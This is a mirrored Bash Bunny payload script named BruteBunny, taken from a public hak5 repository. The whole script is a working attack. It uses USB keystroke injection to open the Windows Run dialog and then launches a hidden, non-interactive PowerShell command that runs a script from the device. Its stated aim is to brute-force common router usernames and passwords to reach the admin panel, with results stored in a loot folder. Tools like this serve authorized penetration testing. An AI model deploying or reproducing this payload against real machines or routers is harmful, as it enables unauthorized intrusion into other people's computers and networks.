mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
50 lines
1.2 KiB
Bash
50 lines
1.2 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: BruteBunny
|
|
# Author: Decoy
|
|
# Version: 1.0
|
|
# Target: Windows XP SP3+
|
|
#
|
|
# Description:
|
|
# Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
|
# access to the admin panel.
|
|
#
|
|
# LEDS:
|
|
# Magenta: Setup
|
|
# Yellow Blink: Attack Stage 1
|
|
# Yellow Double Blink: Attack Stage 2
|
|
# Green Rapid to Solid: Finished
|
|
|
|
# init
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
# set up the things to make it do stuff
|
|
mkdir -p /root/udisk/BruteBunny/loot
|
|
mkdir -p /root/udisk/BruteBunny/wordlists
|
|
|
|
# move wordlists to BruteBunny folder
|
|
cp /root/udisk/payloads/$SWITCH_POSITION/usernames.txt /root/udisk/BruteBunny/wordlists/usernames.txt
|
|
cp /root/udisk/payloads/$SWITCH_POSITION/passwords.txt /root/udisk/BruteBunny/wordlists/passwords.txt
|
|
sync;sleep 1;sync
|
|
|
|
# set attack mode
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# wait for storage
|
|
LED STAGE1
|
|
QUACK DELAY 6000
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
# unleash the brute bunny
|
|
LED STAGE2
|
|
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
|
|
QUACK ENTER
|
|
sleep 10
|
|
|
|
# sync the stuff
|
|
sync;sleep 1;sync
|
|
|
|
LED FINISH
|